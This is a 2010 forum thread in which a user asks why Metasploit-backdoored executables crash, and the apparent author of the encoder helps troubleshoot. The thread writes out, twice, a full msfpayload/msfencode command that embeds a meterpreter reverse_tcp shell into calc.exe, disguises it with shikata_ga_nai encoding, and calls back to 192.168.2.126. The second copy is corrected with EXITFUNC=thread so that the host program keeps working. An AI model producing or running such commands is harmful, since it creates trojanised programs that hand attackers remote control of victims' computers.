carloss Posted March 27, 2010 Share Posted March 27, 2010 Hey I just tryed to put meterpreter into an already existing .exe file. I tryed it with the calc.exe and a quiz.exe which i programed myself. In both cases it crashed on my Windows 7 mashine (64bit), it crashed on my winXp pro (32bit) VM too. I used this command in BT4: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5 i also tryed encoder x86/countdown... No change. Could someone help me please? :) I know I´m a noob :P Quote Link to comment Share on other sites More sharing options...
NUSHOR Posted March 28, 2010 Share Posted March 28, 2010 hmm... whts that "R" doing after your LHOST? Quote Link to comment Share on other sites More sharing options...
carloss Posted March 30, 2010 Author Share Posted March 30, 2010 I dont know what that does o_O :P It was in an article on LINK and i tryed it with it. On BT4 it does the job without errors like expected but the .exe which gets created does not work at all. It simply crashed. I tried calc, notepad and a c++ quiz made by me. Same result: all 3 crashed on 2in7 64bit and XP 32bit. Then i tried the command on BT3 with the calc, notepad and the quiz. Result: The Quiz is working fine! Calc and Notepad are not! I don´t understand why! O_O Quote Link to comment Share on other sites More sharing options...
scriptjunkie Posted April 3, 2010 Share Posted April 3, 2010 (edited) I dont know what that does o_O :P It was in an article on LINK and i tryed it with it. On BT4 it does the job without errors like expected but the .exe which gets created does not work at all. It simply crashed. I tried calc, notepad and a c++ quiz made by me. Same result: all 3 crashed on 2in7 64bit and XP 32bit. Then i tried the command on BT3 with the calc, notepad and the quiz. Result: The Quiz is working fine! Calc and Notepad are not! I don´t understand why! O_O Hey carloss, I am scriptjunkie, and I just wrote that encoding method a few weeks ago. (see https://www.metasploit.com/redmine/issues/1244 ) If it's really not working, I'd love to figure out why. Please upload your original and encoded executables. (if that doesn't work, email me, I'll message you my address if it's not already displayed somewhere) Edit: Be sure in the command to use EXITFUNC=thread. Are you using thread and not seh or process exitfunc? SEH will crash and process will kill the process. 64 bit will not work currently, but I don't know why XP 32 bit won't work. I have tested with as many exe's as I could, and solved as many bugs as I could, but some are not easily solved and I may have missed some. Did you get any error messages? Thanks, scriptjunkie Edited April 5, 2010 by scriptjunkie Quote Link to comment Share on other sites More sharing options...
scriptjunkie Posted April 5, 2010 Share Posted April 5, 2010 (edited) command: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 EXITFUNC=thread R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5 Edited April 5, 2010 by scriptjunkie Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.